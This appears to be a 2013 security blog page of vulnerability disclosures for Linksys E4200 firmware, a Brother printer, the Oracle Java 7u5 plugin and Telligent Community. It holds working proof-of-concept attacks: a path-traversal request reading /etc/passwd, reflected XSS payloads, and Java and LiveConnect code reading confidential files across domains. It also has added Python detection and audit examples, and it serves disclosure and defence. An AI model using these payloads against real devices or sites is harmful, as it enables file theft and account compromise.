Anti-Phishing Research, Tombstones

Monday, May 6, 2013

XSS, LFI, Linksys E4200 Firmware, 0D


XSS, LFI in Cisco, Linksys E4200 Firmware

CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684

Keywords

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp   

Credits

Summary

Reflected XSS and LFI bugs in the Cisco Linksys E4200 Wireless Router, firmware version 1.0.05 build 7, were discovered by our researchers in January 2013 and finally acknowledged by Linksys in April 2013. The vendor is unable to patch the vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview

Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Former Linksys products are now branded as Linksys by Cisco.

Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products.

Linksys products were widely available in North America off-the-shelf from consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competitors as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.

Vendor Software

# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....

The Exploits

LFI PoC

POST /storage/apply.cgi HTTP/1.1
Host: my.vulnerable.e4500.firmware
Content-Type: application/x-www-form-urlencoded

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd

LFI Results

XSS PoC

   /apply.cgi [log_type parameter]
   /apply.cgi [ping_ip parameter]
   /apply.cgi [ping_size parameter]
   /apply.cgi [submit_type parameter]
   /apply.cgi [traceroute_ip parameter]
   /storage/apply.cgi [new_workgroup parameter]
   /storage/apply.cgi [submit_button parameter]

POST /apply.cgi HTTP/1.1
…..
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482

XSS Results

Other XSS PoC’s

&ping_ip=a.b.c.ddb0'><script>alert(1)</script>9479e857331
&ping_size=32dd369'><script>alert(1)</script>71a6e17036a
&submit_type=start_traceroute10808'%3balert(1)//922
&traceroute_ip=a.b.c.df0db4"><script>alert(1)</script>0f8d07c59be

CVE Information

File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684

CVSS Version 2 Score = 4.5

Version Information

XSS, Javascript Injection, Brother MFC-9970CDW Printer Firmware L, 0D


Brother MFC-9970CDW Printer Firmware 

CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676                        

Keywords
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW    

Summary
A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered during a PenTest in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview
Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies.

High-Performance Color Laser All-in-One for your Small Business or Workgroup

The MFC-9970cdw Color Laser All-in-One combines print, copy, scan and fax in one powerful device. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs – making this all-in-one a smart choice for a business or workgroup.

A Bug
Reflected Cross Site Scripting, CWE-79 - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Vulnerable Parameters = id, val, kind + Query String
Signature = "><script>alert(1)</script>

Proof of Concept (PoC) - XSS in Firmware L
Target:         Brother MFC-9970 CDW

GET PoC
/admin/admin_main.html?id=signedpdf"><script>alert(1)</script>&ScanCertificate=2 HTTP/1.1
Host: a.b.c.d

PoC URL
http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script>alert(1)</script>
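As an added defender-side example (not part of the original reports or either vendor's code), the following Python scans request lines for the path-traversal and reflected-XSS probe patterns shown in the Linksys E4200 and Brother MFC-9970CDW PoCs above and flags hits on the parameters the reports name; the sample traffic, hostnames and the tab-separated line format are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the two reports on this page name as injectable.
WATCHED_PARAMS = {"next_page", "log_type", "ping_ip", "ping_size", "submit_type",
                  "traceroute_ip", "new_workgroup", "submit_button",  # Linksys E4200
                  "id", "val", "kind"}                                # Brother MFC-9970CDW
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")                 # ../ or ..\ segment
XSS_RE = re.compile(r"<\s*/?\s*script|[\"']\s*>|;\s*alert\s*\(", re.I)   # tag or attribute break-out

def classify_value(name, value):
    """Return the labels that apply to one decoded parameter (empty list if benign)."""
    labels = []
    decoded = unquote(unquote(value))  # also catches double-encoded probes
    if TRAVERSAL_RE.search(decoded):
        labels.append("traversal")
    if XSS_RE.search(decoded):
        labels.append("xss")
    if labels and name in WATCHED_PARAMS:
        labels.append("known-vulnerable-param")
    return labels

def scan_request(target, body=""):
    """Inspect the query string and form body of one request; return {param: labels} for hits."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    hits = {}
    for name, value in pairs:
        labels = classify_value(name, value)
        if labels:
            hits.setdefault(name, []).extend(labels)
    return hits

def scan_log(lines):
    """Lines are 'METHOD TARGET<TAB>BODY' (constructed format); return [(path, hits)] for flagged requests."""
    flagged = []
    for line in lines:
        request, _, body = line.partition("\t")
        method, _, target = request.partition(" ")
        hits = scan_request(target, body if method == "POST" else "")
        if hits:
            flagged.append((urlsplit(target).path, hits))
    return flagged

# Constructed sample traffic modelled on the PoCs above, not captured from real devices.
SAMPLE_LOG = [
    "POST /storage/apply.cgi\tsubmit_type=nas_admin&change_action=gozila_cgi&next_page=../../../../etc/passwd",
    "POST /apply.cgi\tchange_action=gozila_cgi&submit_button=Log_View&log_type=ilog14568%22%3balert(1)//482",
    "GET /admin/admin_main.html?id=signedpdf%22%3E%3Cscript%3Ealert(1)%3C/script%3E&ScanCertificate=2",
    "GET /admin/admin_main.html?id=websettings&ScanCertificate=2",
]
```

Run scan_log(SAMPLE_LOG) to see the three probing requests flagged and the benign fourth one ignored.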

Rendering

Screen Grab - XSS - Brother MFC-9970CDW


CVE Information
CVE-2013-2507 is specific to Firmware G.
XSS at:
  admin/log_to_net.html  id parameter
  fax/copy_settings.html kind parameter

CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L.
XSS at:
  admin/admin_main.html  name of an arbitrarily assigned URL parameter

CVE-2013-2671 is for the XSS issues that are only present in Firmware L.

CVEs for Firmware L:
Cleartext submission of password CVE-2013-2672
Password field with autocomplete enabled CVE-2013-2673
Cross-domain Referer leakage CVE-2013-2674
Frameable response (Clickjacking) CVE-2013-2675
Private IP addresses disclosed CVE-2013-2676
CVSS 2 Score = 4.5

Timeline
Attempted contact via e-mail in January 2013.
Called the toll-free support line in March 2013.
Callback from vendor in April 2013.
E-mail sent to vendor in April 2013.
VENDOR UNRESPONSIVE
Published May 3, 2013

External Links
Brother USA http://www.brother-usa.com
Model MFC-9970CDW

0D Report
http://xss.cx/

Wednesday, March 27, 2013

CVE-2013-0438, Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes, XSS, Cross Site Scripting


Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes

CVE-2013-0438, Oracle Document

XSS.CX Allowance: $4,000 (Four Thousand US Dollars)

Keywords
Security, Web, Cross-Site Scripting, Private Bug Report, Oracle, Java, JRE, Same-Origin Policy

Summary
A bug in the Oracle Java JRE 7u5 browser plugin allows cross-domain theft of any information encapsulated in a JAR or ZIP file. With the Java browser plugin being used by ~75% of all Internet users[1], this issue affects a total of 1.7B users worldwide[2]. An attacker can access MS Word documents, Excel sheets, Visio data and other ZIP-based files across domains. No user interaction is required to carry out the attack. This document will introduce and discuss the vulnerability and provide several Proof-of-Concept (PoC) installations and code examples.
Introduction

Description
The Same Origin Policy (SOP) implemented in modern browsers compares several components of the origins of two websites attempting to communicate with each other: the protocol the websites use (HTTP, HTTPS or others), the subdomain, domain and top-level domain, and in most user agents the port. Two websites wishing to communicate must share an origin, or use browser features such as domain relaxation or Cross-Origin Resource Sharing (CORS). On the vast majority of websites the SOP serves to limit cross-origin communication for the sake of security and privacy.

The Java Runtime Environment nevertheless has its own interpretation of the SOP and mostly relies on the IP addresses of two HTTP resources to determine whether they may communicate across origins. With Java 6 and earlier versions, cross-origin communication from within a Java applet or LiveConnect code required the browser to load the website via the IPv4 address it can be requested with. A resource residing on 1.2.3.4 could only request information from other resources residing on 1.2.3.4; any other communication attempt from unsigned applets or LiveConnect code caused a security exception to be thrown.

This bug allows bypassing the policy for ZIP-based file types. Through the handler for the jar: pseudo-protocol, all files within the browser's reach, including the intranet, are accessible. Because we abuse a logical bug in the API's control mechanisms, we comfortably have access to Java-exposed interfaces that list the files in an archive and read arbitrary content. The attack is limited to files reachable via HTTP or HTTPS. Since the attack uses Java's environment to access these files, there are a few side effects: Java has its own HTTP stack and does not send the user's cookies when used as an applet. It also has its own certificate store, so self-signed SSL certificates that have been whitelisted in the browser's certificate store are only whitelisted for Java if another applet or Java application has already done so. Valid SSL certificates present no obstacle in this scenario.

This attack is much easier to carry out in Firefox: current Firefox versions come with a feature called LiveConnect that allows JavaScript code to use Java APIs without compiling bytecode Java files into applets. Simple script tags suffice (e.g. <script>x = new java.net.URL(); …</script>).
In this scenario we are bound to the browser's certificate and cookie stores: all outgoing requests can bypass the Same Origin Policy and access foreign files, but they include the user's known sessions and saved passwords and accept formerly whitelisted self-signed certificates.
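As an added educational example (not the original PoC and not Oracle's code), the following Python splits a jar: pseudo-URL into its archive URL and entry path and shows the origin comparison a browser applies (scheme, host, effective port) next to the weaker IP-address comparison the text attributes to the Java plugin; the hostnames and the resolver table are constructed, not real DNS.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def split_jar_url(url):
    """Split 'jar:<archive-url>!/<entry>' into (archive_url, entry); an empty entry means the archive root."""
    if not url.startswith("jar:"):
        raise ValueError("not a jar: URL")
    archive, sep, entry = url[4:].partition("!")
    if not sep:
        raise ValueError("jar: URL needs the '!' separator before the entry path")
    return archive, entry.lstrip("/")

def origin(url):
    """Browser-style origin tuple (scheme, host, effective port) as described in the text."""
    u = urlsplit(url)
    if u.scheme not in DEFAULT_PORTS or not u.hostname:
        raise ValueError("only http(s) URLs have a web origin")
    return (u.scheme, u.hostname.lower(), u.port or DEFAULT_PORTS[u.scheme])

def browser_sop_allows(document_url, jar_url):
    """The check a jar: handler should apply: the archive's origin must equal the document's origin."""
    archive, _ = split_jar_url(jar_url)
    return origin(document_url) == origin(archive)

def ip_sop_allows(document_url, jar_url, resolve):
    """The weaker IP-based comparison the text attributes to the Java plugin.
    `resolve` maps a hostname to its IPv4 address; here a constructed table, not real DNS."""
    archive, _ = split_jar_url(jar_url)
    return resolve(urlsplit(document_url).hostname) == resolve(urlsplit(archive).hostname)

# Constructed hostnames and addresses: two unrelated sites that share one address.
HOSTS = {"site-a.example": "203.0.113.10", "site-b.example": "203.0.113.10",
         "intranet.example": "10.0.0.5"}
```

The IP-based variant lets unrelated sites on one shared address read each other's archives, which is why the origin tuple, not the address, is the right basis for the check.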

PoC Examples
Example 1: Java Applet
This example works in all current browsers that come with Java support. The applet can read arbitrary ZIP files and their content. The target URL assigned to url_b (line 14 of the listing) has to be changed accordingly.

import java.awt.*;
import java.applet.Applet;
import java.io.*;
import java.net.*;

public class test2 extends Applet {

    private TextArea ltArea = new TextArea("", 100, 300);

    public void init() {
        add(ltArea);
    }
    public void paint(Graphics g) {
        String url_b = "jar:http://victim.com/confidential.odt!/content.xml";
        String content = "";
        try {
            URL u = new URL(url_b);
            BufferedReader ff = new BufferedReader(new InputStreamReader(u.openStream()));
            while (ff.ready()) { content += ff.readLine(); }
        }
        catch (Exception e) { g.drawString("Error", 100, 100); }
        ltArea.setText(content);
    }
}

Example 2: Proof of Concept for Firefox, listing ZIP file index and content of specific file
<pre id='res'>
</pre>
<script>
resultdiv = document.querySelector("#res");
url_a = "jar:https://victim.com/confidential.odt!/";
url_b = "jar:https://victim.com/confidential.odt!/content.xml";
//url_a = "jar:http://victim.com/confidential.docx!/";
//url_b = "jar:http://victim.com/confidential.docx!/word/document.xml";

try {
    // Example 1: List all files in JAR-Archive
    resultdiv.textContent += 'Reading JAR and listing files...\n';

    u = new java.net.URL(url_a);
    x = u.openConnection();
    jarfile = x.getJarFile();
    iter = jarfile.entries();
    filelist = [];
    while (iter.hasMoreElements()) {
        i = iter.nextElement();
        filelist.push(i.getName() + " (" + i.getSize() + " Bytes)");
    }
    resultdiv.textContent += "Files in JAR: \n\t" + filelist.join(',\n\t') + '\n\n';

    // Example 2: Read file content in JAR-Archive
    resultdiv.textContent += 'Reading file content in JAR...\n';

    u = new java.net.URL(url_b);
    ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream()));
    content = "";
    while (ff.ready()) { content += ff.readLine(); }
    resultdiv.textContent += "Content of " + url_b + ": \"" + content + '"\n';
}
catch(e) {
    resultdiv.textContent += e;
    resultdiv.textContent += '\nThis example has been tested with Firefox and Java 7 Update 5';
}
</script>
Listing 2: example2_firefox_only.html


Bug Metrics
Calculated CVSSv2 Score = 4.5

Impact: High - The exploit allows reading arbitrary file types that are based on the ZIP format. This includes documents for Microsoft Office, OpenOffice, AutoCAD and many more. Reading can occur from any HTTP or HTTPS resource accessible to the browser, including its intranet.

Exploitability: High - Stemming from a logical bug in the Java API, exploitability has a very high probability of success. The only requirement is, of course, that the Java browser plugin is installed and working.

________________
[1] StatOWL Java plugin usage in 2012 http://www.statowl.com/java.php
[2] World Internet Usage Stats 2012 http://www.internetworldstats.com/stats.htm

Monday, March 25, 2013

CVE-2012-1903, Stored XSS, Javascript Injection, Telligent Community 5.6.583.20496


Telligent Community 5.6.583.20496 (Build: 5.6.583.20496)
CVE-2012-1903
Persistent Flash XSS

Keywords: Security, Web, Cross-Site Scripting, Private Bug Report, Dell, Community, Adobe Flash, Telligent, EoL, No Fix


The affected platform is based on the third-party community software Telligent Community 5.6.583.20496 (Build: 5.6.583.20496). The current release is Community 7.x and was not tested, Version 5 is EoL.

Introduction
Telligent Community is social community software designed for flexibility in building customer-facing communities that achieve your business objectives for improving customer support, building brand loyalty and strengthening member networks. With Telligent Community, you can elevate customer experience with a branded community that perfectly reflects your brand and spur engagement with a complete set of social applications that add social context and relevancy to customer communication. Telligent Community features essential integration with popular social networks including Facebook and Twitter as well as web parts that add social capabilities such as blogging, friending and following to Microsoft SharePoint Internet sites.

Exploit

Our researchers discovered a persistent Flash XSS vulnerability caused by two minor security flaws that together enable the exploit to work properly and cause heavy impact.

1. A logged-in attacker can abuse a Community website to upload a maliciously prepared Flash file. This file is available for public browsing after a successful upload.
2. The Flash file is embedded via an Object element. This element takes a parameter, allowScriptAccess, that limits the potentially dangerous scripting capabilities of the Flash file. While it should be set to the value never, it is actually set to SameDomain. This enables the uploaded file to fully use its scripting capabilities and cause an XSS hazard.
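As an added example (not Telligent's code and not part of the original report), the following Python audit walks HTML markup and reports the effective allowScriptAccess value governing each Flash <object>/<embed>, flagging anything other than never; the markup samples are constructed, and an absent parameter is treated as sameDomain, Flash Player's default.

```python
from html.parser import HTMLParser

class FlashEmbedAuditor(HTMLParser):
    """Collects every <object>/<embed> together with the allowScriptAccess value that governs it."""
    def __init__(self):
        super().__init__()
        self.findings = []   # (tag, movie source, raw allowScriptAccess value or None)
        self._object = None  # state for the <object> currently open

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._object = {"src": a.get("data", ""), "asa": None}
        elif tag == "param" and self._object is not None:
            name = a.get("name", "").lower()
            if name == "movie" and not self._object["src"]:
                self._object["src"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self._object["asa"] = a.get("value", "")
        elif tag == "embed":
            self.findings.append(("embed", a.get("src", ""), a.get("allowscriptaccess")))

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            self.findings.append(("object", self._object["src"], self._object["asa"]))
            self._object = None

def audit_flash_embeds(html):
    """Return [(tag, src, effective value, ok)]; ok is True only when the value is 'never'."""
    parser = FlashEmbedAuditor()
    parser.feed(html)
    results = []
    for tag, src, value in parser.findings:
        effective = value or "sameDomain"  # absent parameter behaves as sameDomain
        results.append((tag, src, effective, effective.lower() == "never"))
    return results

# Constructed markup: the weak setting described above next to the corrected one.
WEAK = '<object data="/uploads/user.swf"><param name="allowScriptAccess" value="SameDomain"></object>'
FIXED = '<object data="/uploads/user.swf"><param name="allowScriptAccess" value="never"></object>'
```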

A Proof of Concept (PoC) link was demonstrated to a target and the PoC was provided in March 2012.

REWARD: 1250 EURO to ANONYMOUS

Bug Metrics:

Impact: High - complete control over a Community website and other Dell domains; Possibility to deploy Flash Malware and Virus Code

Exploitability: Critical - Any user visiting the maliciously prepared website can be affected. The potential victims do not have to be logged in. The attacker requires the victim to have a current version of the Flash Player installed.

Overall Score: Critical - Escalation of Privileges, Persistent Data Modification, Information Disclosure, Malware Distribution

Timeline:

April 9, 2012 - Received confirmation of receipt from Telligent
October 23, 2012 -  Response from Vendor with Ticket ref:_00D408i2C._50040NKYr7:ref
March 25, 2013 - No response from Vendor, Published

Note - Version 5 is EoL